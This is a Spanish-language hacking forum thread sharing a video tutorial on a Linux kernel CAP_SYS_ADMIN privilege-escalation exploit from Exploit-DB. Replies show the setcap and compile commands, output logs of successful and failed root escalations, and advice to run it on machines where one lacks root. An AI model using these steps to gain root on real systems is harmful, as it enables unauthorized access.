[Videotuto] Exploit local linux 32 y 64 bits

Iniciado por illera88, 24 Enero 2011, 20:35 PM

0 Miembros y 2 Visitantes están viendo este tema.

illera88



Hola a todos. Estos días han sido un poco raros y aún sigo con exámenes a si que hacía bastante tiempo que no hacía un videotutorial.
En este lo que hago es una elevación de privilegios en un SO linux (en este caso Kubuntu). Este es el nombre que le han dado en Exploit-DB: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit).
Culquier duda que tengáis ya sabéis que dejáis un comentario e intentaré solucionárosla.


La música del vídeo es a cargo de Full House (http://www.myspace.com/fullhousesalamanca) un grupo de 5 tarados que siempre están ahí cuando se les necesita. Recomiendo que escuchéis sus canciones pero nunca nunca a ellos filosofando sobre la vida, mujeres...


Espero que os guste el vídeo:

http://www.youtube.com/embed/f4GPfuH8Hlw

FUENTE: www.metasploiter.com

EvilGoblin

No lo habia visto, hoy a la noche lo pruebo en Slackware y modifico aca avisando que tal me fue ^^

Gracias! muy bueno para tenerlo en el pendrive :P
Experimental Serial Lain [Linux User]

EvilGoblin


bash-4.1# setcap cap_sys_admin+ep exploit
bash-4.1# exit
exit
bash-4.1$ ./exploit
[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] Resolving kernel symbols...
[*] Failed to resolve kernel symbols.


No me funciono, no encontro CAP_SYS_ADMIN
Experimental Serial Lain [Linux User]

Shell Root

Funciona, pero hay que tener instalado lo siguiente,
Código (bash) [Seleccionar]
alex@shellroot:~$ sudo apt-get install libcap2-bin

Output:
Código (bash) [Seleccionar]
alex@shellroot:~/Escritorio$ gcc -w PoC.c -o PoC

alex@shellroot:~/Escritorio$ sudo setcap cap_sys_admin+ep PoC

alex@shellroot:~/Escritorio$ whoami
alex

alex@shellroot:~/Escritorio$ ./PoC
[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] Resolving kernel symbols...
[+] Resolved proto_tab to 0xfacd59e8
[+] Resolved pn_proto to 0xfacd5840
[+] Resolved pn_proto to 0xfacd5840
[+] Resolved commit_creds to 0xc016c960
[+] Resolved prepare_kernel_cred to 0xc016cdb0
[*] Preparing fake structures...
[*] Copying Structures.
[*] Underflowing with offset -70
[*] Elevating privlidges...
[*] This was a triumph... I\'m making a note here, huge success.
# whoami
root
#
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Garfield07

xD y si no lo tengo instalado cómo lo instalo? xD
Vale, un detalle...
alex@shellroot:~/Escritorio$ sudo setcap cap_sys_admin+ep PoC
¿Me descargo un programa para el que necesito ser root para conseguir ser root? Una cosilla... ¿qué es setcat? xD


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

xassiz~

Cita de: Sagrini en 20 Febrero 2011, 12:31 PM
Una cosilla... ¿qué es setcat? xD
CitarName
setcap - set file capabilities

Synopsis
setcap capabilities filename [ ... capabilitiesN fileN ]

Description
setcap sets the capabilities of each specified filename to the capabilities specified. The capabilities are specified in the form described in cap_from_text(3).


The special filename, '-', can be used to indicate that capabilities are read from the standard input. In such cases, the capability set is terminated with a blank line.
:silbar:

Garfield07

Que se entiende como "capacidades de un archivo"?  :¬¬

Entended que eso no viene preinstalado, y si no usas algo en linux no lo utilizas. Vamos, yo no lo tengo instalado, así que el exploit no funciona.
En resumen, no es un exploit del kernel, es de un complemento del kernel. Eso es importante xD.
De todos modos buen aporte  :)

__________________________________________________

Una cosa... ¿dónde buscas qué es cada comando? En el man no sale, y en google te sale una empresa rarísima por toda la página. Si eso me lo mandas por PM que me hace falta xD; lo he buscado y ni idea :P


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

xassiz~

Cita de: Sagrini en 20 Febrero 2011, 13:50 PM
Una cosa... ¿dónde buscas qué es cada comando? En el man no sale, y en google te sale una empresa rarísima por toda la página. Si eso me lo mandas por PM que me hace falta xD; lo he buscado y ni idea :P
Here

EvilGoblin

Sagrini como te dijeron, el exploit lo armas en tu PC con acceso a ROOT y lo ejecutas en una maquina donde no tenga acceso a root.

yo tengo instalado libcap pero no libcap2, y es necesario que en la maquina que se ejecute tenga instalado libcap2 ????
Experimental Serial Lain [Linux User]

Lunfardo




[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] Resolving kernel symbols...
[+] Resolved proto_tab to 0xe255a1e8
[+] Resolved pn_proto to 0xe255a040
[+] Resolved pn_proto to 0xe255a040
[+] Resolved commit_creds to 0xc016dd80
[+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Preparing fake structures...
[*] Copying Structures.
[*] Underflowing with offset -70
Killed




=( , que habra pasado ?